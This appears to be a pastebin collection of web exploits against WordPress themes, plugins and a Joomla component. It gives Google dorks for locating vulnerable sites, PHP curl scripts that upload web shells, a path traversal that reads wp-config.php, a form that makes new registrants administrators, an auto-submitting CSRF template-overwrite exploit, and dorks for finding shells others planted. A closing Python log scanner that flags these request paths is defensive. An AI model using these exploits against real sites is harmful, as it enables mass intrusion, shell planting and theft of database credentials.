View difference between Paste ID: WbinLehr and 2cFQmtaN
                                                          YH=YH=YH=ANON=Yh=Yh=yH
#YassineElHilali

#1.Exploit Title:WordPress Font Uploader Shell Upload
Google Dork : inurl:/wp-content/plugins/font-uploader/
code===>
<?php

$uploadfile="yourshellname.php.ttf";
$ch = curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
========================================================
#2.Exploit Title:Wordpress plugin Arbitrary File Upload All Version
Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
==>after going to your desire site u will find a file/folder [uploadify] u need to click there
sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
code==>
<?php
$uploadfile="yourshell.php";

$ch = curl_init("http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
==========================================================
#3.Exploit Title:Wordpress Atom Themes Arbitrary File Upload
Google Dork : inurl:"/wp-content/themes/atom/"
code==>
<?php
$uploadfile="yourshell.php";

$ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
=============================================================
#4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
Google Dork:inurl:"/wp-content/themes/soulmedic/"
http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
===>u will find database password/name of that server
================================================================
#5.Exploit Title:PHP File Upload Vulnerability
Google Dork:inurl:images/jupload.php;guest100;guest100
http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
if u find uploading option then u can upload your shell
shell access==>http://www.yourtarget.com/images/shell.php
==================================================================
#6.Exploit Title:Hades+ Framework Add Administrator
Google multiple Dork: inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/
Exploit:
<form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Process==>
1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
2. go to http://www.yourtarget.com/wp-login.php?action=register,  [you will see the registration form].
3. choose your username & email address and register.
4. go to your email, you will find your password.
5. then login & and upload your shell
===============================================================
#7.Exploit Title: Wordpress Dandelion Themes Arbitrary File Upload
Google Dork: inurl:/wp-content/themes/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
=====================================================================
#8.Exploit Title: Wordpress satoshi Themes Arbitrary File Upload
Google Dork: inurl:/wp-content/satoshi/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
========================================================================
#8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
<?php
/**
  * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
  * 3 October 2010
  * jdc
  *
  * How it works - admin template form has no nonce
  * How to exploit - get a logged in admin to click the wrong link ;)
  * Patched in 2.1.7
  */
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
     'pagecontent' => $exploit,
     'template' => 'm2',
     'option' => 'com_mtree',
     'task' => 'save_templatepage',
     'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>"
name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>
#9.Exploit Title:wordpress potential themes vuln upload
1.dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. dork: inurl:/wp-content/themes/blinc/
exploit:/framework/_scripts/valums_uploader/php.php

csrf from html:

<form enctype="multipart/form-data"
action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
if the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
shell link==>
http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
http://www.yourtarget.com/wp-content/uploads/shell.php
#10.Exploit Title:For Noob[Dorking shell]
b374k m1n1
Quote:
google dork :
intitle:b374k m1n1 inurl:wp-content
intitle:"index of /" "b374k.php"


Dorking shell wso
Quote:
google dork :
intitle:"Index of /uploads" "wso.php"
intitle:"index of /" "wso.php"


Dorking Shell Madspot
By default this shell has no password and is indexed by Google, so we can use dorking to find it.
Quote:
google dork :
intitle:Madspot Security site:com


Dorking Shell 1n73ct10n
Quote:
google dork :
intitle:1n73ct10n inurl:wp-content
intitle:"index of /" "1n73ct10n.php"]
###########################################################################################
and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]
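
For site owners, the request paths listed in this paste double as access-log indicators. The following is an added example, not part of the original paste: it flags POSTs to those upload endpoints, the revslider_show_image file read, and scripts served from upload directories. It assumes combined log format; the function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Upload/option endpoints named in the paste, as regexes over the URL path.
POST_ENDPOINTS = [
    ("font-uploader", r"/wp-content/plugins/font-uploader/font-upload\.php$"),
    ("uploadify", r"/uploadify/uploadify\.php$"),
    ("upload-handler", r"/wp-content/themes/[^/]+/functions/upload-handler\.php$"),
    ("valums_uploader", r"/wp-content/themes/[^/]+/.*valums_uploader/php\.php$"),
    ("hades-options", r"/wp-content/themes/[^/]+/hades_framework/option_panel/ajax\.php$"),
]
# A script served from an upload directory, including double extensions (x.php.ttf).
SCRIPT_IN_UPLOADS = re.compile(r"/uploads?/.*\.(php\d?|phtml)(\.\w+)?$", re.I)
# Combined log format: client, two ignored fields, [time], "METHOD target proto", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client, finding, status) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    path, query = unquote(url.path), parse_qs(url.query)
    if method == "POST":
        for name, pattern in POST_ENDPOINTS:
            if re.search(pattern, path, re.I):
                return (ip, "upload-endpoint:" + name, status)
    if path.endswith("/admin-ajax.php") and "revslider_show_image" in query.get("action", []):
        if any(".." in v or v.lower().endswith(".php") for v in query.get("img", [])):
            return (ip, "revslider-file-read", status)
    if SCRIPT_IN_UPLOADS.search(path):
        return (ip, "script-in-uploads", status)
    return None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-content/plugins/font-uploader/font-upload.php HTTP/1.1" 200 31 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php HTTP/1.1" 200 2841 "-" "curl/8.0"
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/themes/atom/uploadify/uploads/1234x.php HTTP/1.1" 200 12 "-" "curl/8.0"
198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 is the case to triage first: check the matching theme or plugin directory and the upload folders for files that should not be there, and remove or update the component.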